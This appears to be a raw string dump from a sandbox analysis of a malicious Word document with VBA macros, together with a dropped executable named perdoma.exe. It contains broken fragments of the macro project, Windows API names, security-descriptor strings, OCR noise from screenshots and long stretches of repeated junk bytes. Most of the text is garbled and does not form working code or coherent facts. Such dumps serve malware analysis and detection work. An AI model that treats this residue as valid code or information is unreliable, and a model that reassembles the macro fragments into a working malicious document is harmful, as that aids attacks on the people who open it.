ClaveNORMA0chkNORMAC0ClaveNORMACOMPi0ValidarProcIncer0sProc10ValidarProc0sNORMA0CargarFrecs0ManipularErrorCargarProcesado@0say*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.3#0#C:\Program Files (x86)\Microsoft Office\OFFICE11\MSWORD.OLB#Microsoft Word 11.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation*\CNormal*\CNormalnX4*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.3#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE11\MSO.DLL#Microsoft Office 11.0 Object Library*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library*\G{AC4BB76D-5A0F-450E-8E46-565CD724AF39}#2.0#0#%TEMP%\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library.E

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveOUTSONDAt0ClaveFIN_SNIFTD0ClaveFIN_EXPAND,j0ClaveINI_SFIFT50ClaveR0K0ClaveLFI00

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePERDYGAN*q0ClaveFSONDA0ClaveFIN_CNIFT0ClaveINI_PNIFTa0ClaveTHETA_PX0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_C]f0ClaveCENTRAR_CA0PrefSIY0PrefNO0Grayed0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Pjf0ClaveFICHRNFOs0ClaveFICHPRB-i0ClaveFICHREFr0ClavePERDINS0ClaveFIN_PNIFT{0ClaveINI_PNIFUa0ClaveCENTGIRAR_UI0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Uof0ClaveFACTEXP0ClaveFINV0ClaveFIN_PNIFU|0EOF0Split)0UserForm1)0ComboBox1'0perd10MsgBoxR0vbOKOnly0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePNIFT0chkCoordP0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePNIFU0GuardarFichProc0SalirGuardarProc60sPathProceso 0frmProcesado0cboTExcitacion0rbp0VbGet0VbMethod0perd90chkNORMA0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveSFIFT>0chkCPCF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveTRANSF_U'0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientHeight = VBFrame^#PROJECTwmc_PROJECTeCompObjnq 3180

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientLeft = 45

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientTop = 375

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientWidth = 4710

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CLUSAPI.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ClusterNetworkEnum

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

CMG="1517E4771CF220F220F220F220"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CompanyName

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (perdoma.exe )

Corporation

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

CPXGIqX?XpwX .FU(7<gXI!IOXt@"9sbhhpNSF_=&NCAMBIeD2:NSIFCO/'fRCMPTE-PXY(BAAEo`bFTHPHo`RHLaEMEMFORMA~T))_1(SI234E.RW?hV'bO.L.1.U/J%z(sUbR

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CreateHardLinkW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ctE_1 As ObjecJt|2>3 @4Sng`56Const STILL_A CTIVE&H103

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

d trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

D$0.|

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$@@x

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$`+f

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$hnf

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$lR3

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$x0q

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$X@x

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D:(A;;0x120003;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x120003;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x1201FD;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0xA201FD;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D@im unc@t`E_7() As Varian@@dMAr(10074, )86228i177#69b817j1$5C023277D%D#E9C7191.O@pen mata(5), AddFieldToM(29`Fa/GoTo ,be12_N1QN2MdERDYGANB^3ee__F~9r]`NQPNWqs>PXP]PR@_PveuSPPPSP@asyv@U;_Pj(1-PP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

dGlobalSpaco FalseCr@eatablPredeclaDIdTru

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DiagnosticsIdentifier:(SZ) 6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Ansi based on Dropped File (369281.od)

Dim mandata()-PROCESS_QUERY_INFORM ATION$400USub CargarFichProc(Nombreero1P)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DisconnectNamedPipe

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

DKLKKKLKKLKKKKLKLKLKLMKKKKLKL>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Document=ThisDocument/&H00000000

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DPB="949665F89B769C769C76"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

E_nf_g_n

Ansi based on Image Processing (screen_0.png)

E_nt'J__n

Ansi based on Image Processing (screen_0.png)

E_nt_9'n_

Ansi based on Image Processing (screen_2.png)

egistered trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

eh}_k=<m

Ansi based on Dropped File (g545[1].exe.177218)

Einf_9in_

Ansi based on Image Processing (screen_3.png)

Einf_gin

Ansi based on Image Processing (screen_1.png)

Einfa9in_

Ansi based on Image Processing (screen_1.png)

Einfegin

Ansi based on Image Processing (screen_3.png)

ElsN|perd1: ~CallByName unc@t`E_2, mandata(7), VbLe3@CPEAsteriscos &, _INI_"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

en-US

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

En91;cch(uIAt

Ansi based on Image Processing (screen_5.png)

EnableConsoleTracing

Unicode based on Runtime Data (perdoma.exe )

EnableFileTracing

Unicode based on Runtime Data (perdoma.exe )

End If Print #f, Clav eFIN_FU, vbNewLine\:Close perdD3:"unctE_2.OpenGuardarFichProc ""

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

End Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

EnumUILanguagesA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

eoX{ThisDocument07586f65e4ThisDocument~0Module102586f65e3Module1, UserForm103586f65e3SUserForm1h

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ExtraeDato0DchaC0ExtraeDatoIe0zqda0CharLineaVaciac0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f = FreeFile8Open@ Nombr"c@hero FOutput As fHPrint #f, "FICHERO_MED", frmAnalisisIncertiduJs.txtDAMA.Text, _DvbNewLinuPINCERRsPath@Medida7ClaveNOFRDEClstvcuencias.ListCountGsi0 d - 1 Step 1&hQ&(i) N &i$IfNivelRuido <> "" ThenJ"S/N_RUIDO(mBo@End I!DriftV DRIFT_GRpADOS!BMod dBn Leakage AaLEAKAGE Cable$sJ\asCABLES_JUNTAS2z94?5

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

F Microsoft Office Word

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f":_+<:_;Q:_aOn } ypf $Fre l! KHputeDAMA,+txtQ2luW@NOFREClst`cuencias.ListCoun` A<0 0OC - 1ep i""_](iQ < iy]chTkN"ACI DWAsteriscos4:6qTEXCIT, hCS7COMP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k0 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k86 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X

Ansi based on Dropped File (g545[1].exe.177218)

f,b 6 % f,b f%b % f,b KT 6 f,b KT KT'J +R KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 j,b j%b j,bd T j,bk KT 6 j,b KT 6 j,b j%b j,bd T j,bk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b 6 % f,b f%b % f,b KT 6 f,b KT KT'J +R KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 j,b j%b j,bdh T j,bkH KT 6 j,b KT 6 j,b j%b j,bd T j,bk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b KT 6 % KT f,b KT T f,bS f,bnh 6 % f,b f%b % f,b KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b KT 6 % KT f,b KT T f,bS0 f,bn]$. $j B@'Z'f'f'b','!'!'\'\'U'a'^'^' '['`'!'''('Y'X'!'Y'''&''' 'W'j'W'D'*' 6 % f,b f%b % f,b KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

F.@bR5IICN_ s1^1&?P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Fall?Boolea&n*= sebHayN65CSNIFTDEXPAN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Farmahar_agin

Ansi based on Image Processing (screen_4.png)

Farmaharlag'n

Ansi based on Image Processing (screen_2.png)

Farmaharlag,n

Ansi based on Image Processing (screen_0.png)

FFFFFFF$""

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FFGD_S34309_Kcmcati_iliti'tsmcdus_-Micr0s0_lN0rd

Ansi based on Image Processing (screen_4.png)

FFGD_S34309_Kcmcati_iliti'tsmcdus_-Micr0s0ftW0rd

Ansi based on Image Processing (screen_1.png)

FFnFnnnF:s`Z"P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

fG"2_[425<25L On Error GoTo ManipularGuardarProc

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FichConfig}0EXTin0TExcit0ManipularErrorGuardarNORMA<0uTMedida0Iniciales40Ini_CLBn0Ext_CCL60Ext_CCP:0Ext_CIN0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCER ` !! 8 !! 8 !% 8 ` ! S/N_RUIDO !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCERKT 6' KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FileDirectory

Unicode based on Runtime Data (perdoma.exe )

FileTracingMask

Unicode based on Runtime Data (perdoma.exe )

FillConsoleOutputCharacterA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

FoldStringW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

FORM"Mp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Formahor_aggn

Ansi based on Image Processing (screen_1.png)

FORMFe_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FreeConsole

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

G51[3_TK]6_c(X6]SOND4'.o't1Qr_o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

G\GATru2lsaFa3&?~8yby?r#(9~ybyKTprpQ`_+1&wtUAbAo_A_A_Aao`_ArZAa@@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

GC="1311E27D607E607E9F"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

GetCommProperties

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetCPInfoExW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetEnvironmentStrings

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetProfileStringA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetVolumeNameForVolumeMountPointW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetWriteWatch

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

gjhCElse#EXPAN~C&Seln Caa$cbo9J.Tdb!LINX@IO= Pref"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gModule1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gPub(licm (N`ombreXAPs Stg%Dim f I^ger]ixCPE

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h Nh"h$h&h(h*H,L .H0L8(i2``4`6`8`:`<+jH)lhin`p`rhTi2``4`6`8`:`< @i2`X`8`<`B`H`N` R` 8``` X` 8`8`,\` ^` 8 i28`,b`8 h` 8`8`,b`,b` l` 8`8`,p`'`` t` x`K `T.X%i2N`8823i28`8KT6

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h%^*\G{00_VBA_PROJECTdir.U__SRP_0<__SRP_1UnSONDA_10PrefSONDA_20ClaveSONDA_20PrefSONDA_30ClaveSONDA_30ClaveROUTU0SinLeth0ras0ClaveOUTTHETA_SE=)0ExtraeDam0toDcha]0toIzqda0ClaveOUTPHI_SE-0ExtraeDatoD`0cha:~0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

H'Narh'

Ansi based on Image Processing (screen_2.png)

H,Narh,

Ansi based on Image Processing (screen_0.png)

h@%%% @@x@peoX$*\Rffff*07586f65e44"(/A@o`XAttribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

HelpContextID="0"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

HiNarhi

Ansi based on Image Processing (screen_1.png)

HiNarhi...

Ansi based on Image Processing (screen_4.png)

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

Unicode based on Runtime Data (perdoma.exe )

hU,1h. A!"R#n$n%B@B1KG=K9CJ_HaJmHsHtHBABA=>2=>9 H@8DB 0170F0XiX1KG=0O B01;8F04

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

i''__i_i

Ansi based on Image Processing (screen_5.png)

i'ndirn

Ansi based on Image Processing (screen_4.png)

i0CharXSint3FQI_E .L#

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

I8NI_}TExcitacionNInSond"aOutTPorizNTNolrm@OFCArrar_cUG

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

i`07KC6AM

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

IHDR

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

iHZ,` `8`J`L

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

iibirprMin

Ansi based on Image Processing (screen_1.png)

iii_'0

Ansi based on Image Processing (screen_5.png)

ij0>tF

Ansi based on Dropped File (g545[1].exe.177218)

imitNmROman

Ansi based on Image Processing (screen_4.png)

INCERathMedidaaClaveNOFREC 1`]ix(VaDl(NLe.sn(

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INI_o`%5)V|C`^xT0Z6_tc(X6#@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INSONDA, InSo9sSN D_E.XPAND(8!"ROUT,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

IQ^LLLLLL___RR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

IQ```a\a_`_URR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

IQ`LLLLLL\]a_a]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

is_wctype

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

isdigit

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

iuTransSGmpte_GoTo @VIf frmAesado.optSNIFTD@.ValueTrThBg=C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j% KT ' TKT 'n j% KT ' KT 'n j% KT ' $KT "' (KT &' ,KT *' 0KT .'n8 j% 6KT 4' :KT 8' >KT <' BKT @'n ' 2 FICHERO_MED !!d `

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pkx H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k4 !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pk3 H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

J>>>>>>>>>>>>>>>>ACA>>>>>>>>>G

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jurrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrruj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

juuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

k#L6

Ansi based on Runtime Data (perdoma.exe )

K2@K2@

Ansi based on Hybrid Analysis (perdoma.exe , 00177718-00001784.00000001.200171.401000.00000020.mdmp)

KEc"P`xINSBWE(2"N_ehU aU]4SY

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

KERNEL32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

KT 6 % j,b j%b % j,b KT KT'L

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

l(a%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X

Ansi based on Dropped File (g545[1].exe.177218)

l4a.k.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_3.png)

l__'_.::'_.::'_._l

Ansi based on Image Processing (screen_1.png)

l_XU___x,x'__ll'_b__A_ll_____-__--_--_-_=l_l____l

Ansi based on Image Processing (screen_0.png)

l_xu__x,x'__ll'ib_A_ll-_--_-----_-----_l

Ansi based on Image Processing (screen_1.png)

LanguageList

Unicode based on Runtime Data (perdoma.exe )

legacy CPL elevated

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

LegalCopyright

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

LElevated.EXE

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

leoXJ<

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Line #f, C;7= ExtraeDatoD.cha(CL@SelectWseG.oIzqdCaClaveNOFREC#D:ix((S inLe.@s()t!p>= 1Is";DsMax sLimi,in,ax

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

lnln,FFnFFFFFd

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Manipula rErro

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Manipular0Erro\yNo existe Pel fs 0s@t? da?

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ManipularErromi@MsgBo@x("No p udo g el fichero correctp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ManipularErroNo existe el fic hero `st? da?@"&`NewLine &

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Markiirin

Ansi based on Image Processing (screen_1.png)

Marklirin

Ansi based on Image Processing (screen_4.png)

mataSplit(UserForm1.ComboBox1.T@ext, NrHeFiProGoTo QQ7pwEiMsg("Se han ignorado algunas en@das, comppbe lanfiguraci?n", _4vbOKOnly + vbInf

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

MaxFileSize

Unicode based on Runtime Data (perdoma.exe )

memmove

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

MessageBoxA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

Microsoft Corporation'

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Microsoft Forms 2.0 FormEmbedded Object9qVERSION 5.00

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

mKZEFV\$9-%TEMP%\VBE\MSForms.exd

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Module1=150, 150, 1498, 570, Z

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Module=Module1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

MopD.chL&L7LPHI

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

msvcrt.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

m{hAXO

Ansi based on Dropped File (g545[1].exe.177218)

n%p %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk0 L `k J V "B@A@|

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk83 L `k3 J V$2 "$. " (A@2|22

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n,p JKT LKTS0'<n $N VP R!T!d 2$P'.V

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n,pS/N_RUIDOKT 6 % !(d 6'vDRIFT_GRADOSKT 6 % !(d 6'xDRIFT_dBKT 6 % !(d 6'zS/N_LEAKAGEKT 6 % !(d 6'|CABLES_JUNTAS_GRADOSKT 6 % !(d 6'~CABLES_JUNTAS_dBKT 6 % !(d 6'NO_SIMULKT 6 % !(d 6'JUNTOKT 6S !( 'k 6' JKT LKTS'<n $N V <<Se han ignorado algunas entradas, compruebe la configuraci?n Z \AVISO PROCESADO DE DATOS$X'8k^|r"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8`X &\perdoma.exe'(A@o ]`]x]]]]]]] ]8]P]h]]]]P !! ' ' ' !!e ' ' 'k( % KT ' KT ' KT ' KT ' KT 'n

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n0nlZ

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

N6)%7

